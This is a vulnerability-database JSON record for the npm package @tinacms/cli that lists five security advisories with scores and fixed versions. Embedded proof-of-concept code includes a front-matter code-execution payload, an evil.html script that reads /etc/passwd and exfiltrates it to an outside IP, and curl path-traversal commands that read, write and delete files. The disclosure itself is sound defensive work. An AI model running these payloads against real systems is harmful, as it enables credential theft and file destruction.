{"url":"http://public2.vulnerablecode.io/api/packages/724349?format=json","purl":"pkg:npm/%40tinacms/cli@0.0.0-20240807041315","type":"npm","namespace":"@tinacms","name":"cli","version":"0.0.0-20240807041315","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"2.1.8","latest_non_vulnerable_version":"2.1.8","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29811?format=json","vulnerability_id":"VCID-1t1f-j9dh-4keu","summary":"tinacms is vulnerable to arbitrary code execution\n### Summary\n```tinacms``` uses the ```gray-matter``` package in an insecure way allowing attackers that can control the content of the processed markdown files, e.g., blog posts, to execute arbitrary code.\n\n### Details\nThe ```gray-matter``` package executes by default the code in the markdown file's front matter. ```tinacms``` does not change this behavior when process markdown file, e.g., by passing a custom engine property for js/javascript in the options object.\n\n### PoC\n1. Create a tinacms app using the cli/documentation: \n```\nnpx create-tina-app@latest\n```\n2. Modify one of the blog posts to contain the following front matter:\n```js\n---js\n{\n  \"title\": \"Pawned\" + console.log(require(\"fs\").readFileSync(\"/etc/passwd\").toString())\n}\n---\n```\n3. Start the tinacms server, e.g., with ```npm run dev```\n4. Observe the console of the server printing the password file, showing that attackers can execute arbitrary commands. \n\n### Impact\nRCE: attackers can execute arbitrary JavaScript code on the server hosting tinacms.\n\n### Feasibility\nPotential attack scenarios can be executed like this: Companies often have technical writers as contractors. These contractors produce md files, which they send over email or upload in a shared cloud folder. Developers download these files and upload them in ```tinacms```'s content folder. While this example might appear speculative or contrived, a general observation is that developers would be very surprised to find out that processing untrusted markdown files via ```tinacms``` = server-side code execution = complete machine take over. That is, ```tinacms``` users might not expect markdown files to contain anything else than data and ```gray-matter``` violates that assumption.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68278","reference_id":"","reference_type":"","scores":[{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21375","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68278"},{"reference_url":"https://github.com/tinacms/tinacms","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms"},{"reference_url":"https://github.com/tinacms/tinacms/commit/fa7c27abef968e3f3a3e7d564f282bc566087569","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-18T15:45:22Z/"}],"url":"https://github.com/tinacms/tinacms/commit/fa7c27abef968e3f3a3e7d564f282bc566087569"},{"reference_url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-529f-9qwm-9628","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-12-18T15:45:22Z/"}],"url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-529f-9qwm-9628"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68278","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68278"},{"reference_url":"https://github.com/advisories/GHSA-529f-9qwm-9628","reference_id":"GHSA-529f-9qwm-9628","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-529f-9qwm-9628"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/63216?format=json","purl":"pkg:npm/%40tinacms/cli@2.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-c4vv-e1p8-aqb2"},{"vulnerability":"VCID-efu3-agqz-uqcv"},{"vulnerability":"VCID-qapb-p2uz-dqdr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540tinacms/cli@2.0.4"}],"aliases":["CVE-2025-68278","GHSA-529f-9qwm-9628"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1t1f-j9dh-4keu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/8716?format=json","vulnerability_id":"VCID-5m2j-bmeg-hyhp","summary":"Tina search token leak via lock file in TinaCMS\n### Impact\nTina search token leaked via lock file (tina-lock.json) in TinaCMS. Sites building with @tinacms/cli < 1.6.2 that use a search token are impacted.\n\nIf your Tina-enabled website has search setup, you should rotate that key immediately.\n\n### Patches\nThis issue has been patched in @tinacms/cli@1.6.2\n\n### Workarounds\nUpgrading, and rotating search token is required for the proper fix.\n\n### References\nhttps://github.com/tinacms/tinacms/pull/4758","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45391","reference_id":"","reference_type":"","scores":[{"value":"0.00253","scoring_system":"epss","scoring_elements":"0.4882","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45391"},{"reference_url":"https://github.com/tinacms/tinacms","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms"},{"reference_url":"https://github.com/tinacms/tinacms/commit/110f1ceea4574d636a64526648f7c8bf6539b26a","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-03T20:23:50Z/"}],"url":"https://github.com/tinacms/tinacms/commit/110f1ceea4574d636a64526648f7c8bf6539b26a"},{"reference_url":"https://github.com/tinacms/tinacms/pull/4758","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-03T20:23:50Z/"}],"url":"https://github.com/tinacms/tinacms/pull/4758"},{"reference_url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-4qrm-9h4r-v2fx","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-03T20:23:50Z/"}],"url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-4qrm-9h4r-v2fx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45391","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45391"},{"reference_url":"https://github.com/advisories/GHSA-4qrm-9h4r-v2fx","reference_id":"GHSA-4qrm-9h4r-v2fx","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4qrm-9h4r-v2fx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/22496?format=json","purl":"pkg:npm/%40tinacms/cli@1.6.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1t1f-j9dh-4keu"},{"vulnerability":"VCID-c4vv-e1p8-aqb2"},{"vulnerability":"VCID-efu3-agqz-uqcv"},{"vulnerability":"VCID-qapb-p2uz-dqdr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540tinacms/cli@1.6.2"}],"aliases":["CVE-2024-45391","GHSA-4qrm-9h4r-v2fx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5m2j-bmeg-hyhp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21455?format=json","vulnerability_id":"VCID-c4vv-e1p8-aqb2","summary":"TinaCMS CLI Dev Server Vulnerable to Cross-Origin File Exfiltration via CORS Misconfiguration + Path Traversal in TinaCMS\n## Summary\nThe TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running.\n\n## Details\nThe TinaCMS dev server sets permissive CORS headers that allow **any origin** to make cross-origin requests:\n\n- packages/@tinacms/cli/src/server/server.ts:\n```\n  app.use(cors());\n```\n\n- packages/@tinacms/cli/src/next/vite/plugins.ts:\n```\n     server.middlewares.use(cors());\n```\nWhen combined with the path traversal vulnerability, this creates a complete attack chain.\n## Attack Scenario\n\n### Prerequisites\n1. Developer runs `tinacms dev` (default port 4001) \n2. Developer visits attacker's website while TinaCMS is running\n\n**No other conditions required** - the dev server doesn't need to be:\n- Exposed to the internet\n- Bound to 0.0.0.0\n- Accessible outside localhost\n\n### Attack Flow\n1. Developer starts TinaCMS: `tinacms dev`\n2. Developer browses the web (checking email, social media, etc.)\n3. Developer unknowingly visits attacker-controlled page (malicious ad, compromised site, etc.)\n4. Attacker's JavaScript exploits CORS + path traversal to read sensitive files\n5. Files are exfiltrated to attacker's server\n\n## PoC\n### Attacker's Malicious Website (evil.html):\n```\n<script>\nfetch('http://localhost:4001/../../../etc/passwd')\n  .then(r => r.text())\n  .then(data => {\n    // Exfil via GET\n    const img = new Image();\n    img.src = 'http://192.168.11.117:8080/exfil?data=' + encodeURIComponent(data);\n  });\n</script>\n```\n### Demonstration\n\n**Step 1:** Start TinaCMS dev server\n```bash\ntinacms dev\n# Server running on http://localhost:4001\n```\n\n**Step 2:** Host evil.html on attacker server\n```bash\npython3 -m http.server 8000\n```\n\n**Step 3:** Developer visits `http://attacker-server:8000/evil.html`\n\n**Result:** The browser makes cross-origin requests to localhost:4001.\nBecause cors() returns Access-Control-Allow-Origin: *, the browser\nallows the JavaScript to read the responses. Directory listings from\noutside the media directory are sent to the attacker's server.\n<img width=\"1900\" height=\"366\" alt=\"image\" src=\"https://github.com/user-attachments/assets/72fdd31d-dd93-4728-9a4b-4d7d66d33617\" />\n\n\n## Impact\n### Who is affected\nEvery developer running `tinacms dev` is vulnerable while the dev server is active. No special configuration is required the default setup is exploitable.\n\n### What an attacker achieves\nBy hosting a malicious webpage (or injecting script via a compromised ad network, XSS on a forum, etc.), the attacker can silently:\n\n1. **Enumerate the developer's filesystem** directory listings via `/media/list/` with path traversal reveal file and folder names\n   across the entire filesystem\n2. **Discover sensitive files** locate `.env`, `.git/config`,  SSH keys, cloud credentials, database configs\n3. **Write arbitrary files** via `/media/upload/` with path traversal, the attacker can overwrite project source files, inject backdoors, or modify build scripts\n4. **Delete arbitrary files** via `/media/` DELETE with path traversal","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28792","reference_id":"","reference_type":"","scores":[{"value":"0.00484","scoring_system":"epss","scoring_elements":"0.65564","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28792"},{"reference_url":"https://github.com/tinacms/tinacms","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms"},{"reference_url":"https://github.com/tinacms/tinacms/commit/56d533e610a520ba66b3e58f3a0dc03487d5d5d7","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms/commit/56d533e610a520ba66b3e58f3a0dc03487d5d5d7"},{"reference_url":"https://github.com/tinacms/tinacms/pull/6450","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms/pull/6450"},{"reference_url":"https://github.com/tinacms/tinacms/releases/tag/%40tinacms%2Fcli%402.1.8","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms/releases/tag/%40tinacms%2Fcli%402.1.8"},{"reference_url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-8pw3-9m7f-q734","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"9.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-13T16:29:02Z/"}],"url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-8pw3-9m7f-q734"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28792","reference_id":"","reference_type":"","scores":[{"value":"9.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28792"},{"reference_url":"https://github.com/advisories/GHSA-8pw3-9m7f-q734","reference_id":"GHSA-8pw3-9m7f-q734","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-8pw3-9m7f-q734"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56820?format=json","purl":"pkg:npm/%40tinacms/cli@2.1.8","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540tinacms/cli@2.1.8"}],"aliases":["CVE-2026-28792","GHSA-8pw3-9m7f-q734"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-c4vv-e1p8-aqb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21594?format=json","vulnerability_id":"VCID-efu3-agqz-uqcv","summary":"TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction\n## Summary\nThe TinaCMS CLI dev server configures Vite with `server.fs.strict: false`, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system\n\n## Details\nWhen running `tinacms dev`, the CLI starts a Vite dev server configured in:\n`packages/@tinacms/cli/src/next/vite/index.ts`\n```\nserver: {\n  host: configManager.config?.build?.host ?? false,\n  ...\n  fs: {\n    strict: false, // Disables Vite's filesystem access restriction\n  },\n},\n```\nTinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite's default static file handler, which will serve the file directly from the absolute path on the filesystem.\nAdditionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.\n\n## PoC\n\n**Prerequisites**: TinaCMS CLI dev server running (default port 4001).\n\n- Read system files directly:\n```\ncurl http://localhost:4001/etc/passwd\n```\n<img width=\"705\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6fd0e1c7-a549-40c8-bc81-af9c343f52a0\" />\n\n```\ncurl http://localhost:4001/etc/hostname\n```\n<img width=\"631\" height=\"41\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd103dc3-d4c3-4774-8007-b55de3fc2a9e\" />\nVite resolves and serves the absolute path directly from the filesystem.\n\n\n## Impact\nAny developer running tinacms dev in an environment where the dev server port is reachable by an attacker. This includes:\n\n- Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible\n\n- Docker or VM setups with port forwarding configured\n\n- Misconfigured environments binding to 0.0.0.0 via the build.host config option\n\n- Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy\n\n- Local environments with malicious dependencies running on the same machine\n\nAn attacker who can reach port 4001 can:\n\n- Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)\n\n- Exfiltrate environment variables and secrets via /proc/self/environ\n\n- Access cloud credentials and API keys from configuration files","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29066","reference_id":"","reference_type":"","scores":[{"value":"0.06479","scoring_system":"epss","scoring_elements":"0.91229","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-29066"},{"reference_url":"https://github.com/tinacms/tinacms","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms"},{"reference_url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-13T16:27:18Z/"}],"url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29066","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-29066"},{"reference_url":"https://github.com/advisories/GHSA-m48g-4wr2-j2h6","reference_id":"GHSA-m48g-4wr2-j2h6","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-m48g-4wr2-j2h6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56820?format=json","purl":"pkg:npm/%40tinacms/cli@2.1.8","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540tinacms/cli@2.1.8"}],"aliases":["CVE-2026-29066","GHSA-m48g-4wr2-j2h6"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-efu3-agqz-uqcv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/23153?format=json","vulnerability_id":"VCID-qapb-p2uz-dqdr","summary":"TinaCMS Vulnerable to Path Traversal Leading to Arbitrary File Read, Write and Delete\n## Summary\nThe TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory.\n\n## Details\nWhen running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as:\n\n- /media/list/*\n\n- /media/upload/*\n\n- /media/*\n\nThese endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory.\n\n### Vulnerable code\n```\nbb.on('file', async (_name, file, _info) => {\n      const fullPath = decodeURI(req.url?.slice('/media/upload/'.length));\n      const saveTo = path.join(mediaFolder, ...fullPath.split('/'));\n// No validation that saveTo remains within mediaFolder\n      await fs.ensureDir(path.dirname(saveTo));\n      file.pipe(fs.createWriteStream(saveTo));\n    });\n```\n## PoC\n**Arbitrary File Read**\n```\ncurl \"http://localhost:4001/media/list/../../../etc/passwd\"\n```\n\nResult:\n\n<img width=\"889\" height=\"280\" alt=\"image(1)\" src=\"https://github.com/user-attachments/assets/a878a86a-71db-46ed-abda-3d4ddba692e0\" />\n\n\n**Arbitrary File Write**\n```\necho \"ATTACKER_CONTROLLED_CONTENT\" > /tmp/payload.txt\n\ncurl --path-as-is -X POST \\\n  \"http://localhost:4001/media/upload/../../../../../../tmp/pwned.txt\" \\\n  -F \"file=@/tmp/payload.txt\"\ncat /tmp/pwned.txt\n```\nResult:\n<img width=\"1320\" height=\"84\" alt=\"image(8)\" src=\"https://github.com/user-attachments/assets/8bd5046b-0456-474f-ab96-4e18a421997c\" />\n\n**Arbitrary File Delete**\n```\necho \"delete_me\" > /tmp/delete-test.txt\ncat /tmp/delete-test.txt # confirms file exists\ncurl --path-as-is -X DELETE \\\n\"http://localhost:4001/media/../../../../../../tmp/delete-test.txt\"\ncat /tmp/delete-test.txt # \"No such file or directory\"\n```\n<img width=\"1135\" height=\"105\" alt=\"image\" src=\"https://github.com/user-attachments/assets/64c24b83-0259-4a12-969d-98c8e8cc81ca\" />\n\n## Impact\n\nAn attacker who can reach the TinaCMS CLI dev server can:\n\n- Read arbitrary files (e.g. /etc/passwd, .env, SSH keys)\n\n- Write arbitrary files anywhere writable by the server process\n\n- Delete or overwrite files, depending on endpoint usage\n\n- Escalate to code execution in realistic development setups by overwriting executable scripts, configuration files, or watched source files\n\n## Attack Surface\n\nThe dev server binds to localhost by default, but exploitation is realistic in:\n\n- Cloud IDEs (Codespaces, Gitpod)\n\n- Docker or VM setups with port forwarding\n\n- Misconfigured dev environments binding to 0.0.0.0\n\n- Local malware or malicious dependencies\n\nThe server also enables permissive CORS, which may allow browser-based exploitation if the dev server is externally reachable, but CORS is not required for exploitation.\n\n## Recommended Fix\n\n- Resolve paths to absolute form\n\n- Enforce that resolved paths remain within the media root\n\n- Reject .. path segments and absolute paths\n\n- Consider authentication or token protection for dev server endpoints","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28793","reference_id":"","reference_type":"","scores":[{"value":"0.00034","scoring_system":"epss","scoring_elements":"0.1044","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-28793"},{"reference_url":"https://github.com/tinacms/tinacms","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tinacms/tinacms"},{"reference_url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-13T16:28:28Z/"}],"url":"https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28793","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28793"},{"reference_url":"https://github.com/advisories/GHSA-2f24-mg4x-534q","reference_id":"GHSA-2f24-mg4x-534q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2f24-mg4x-534q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56820?format=json","purl":"pkg:npm/%40tinacms/cli@2.1.8","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540tinacms/cli@2.1.8"}],"aliases":["CVE-2026-28793","GHSA-2f24-mg4x-534q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qapb-p2uz-dqdr"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/%2540tinacms/cli@0.0.0-20240807041315"}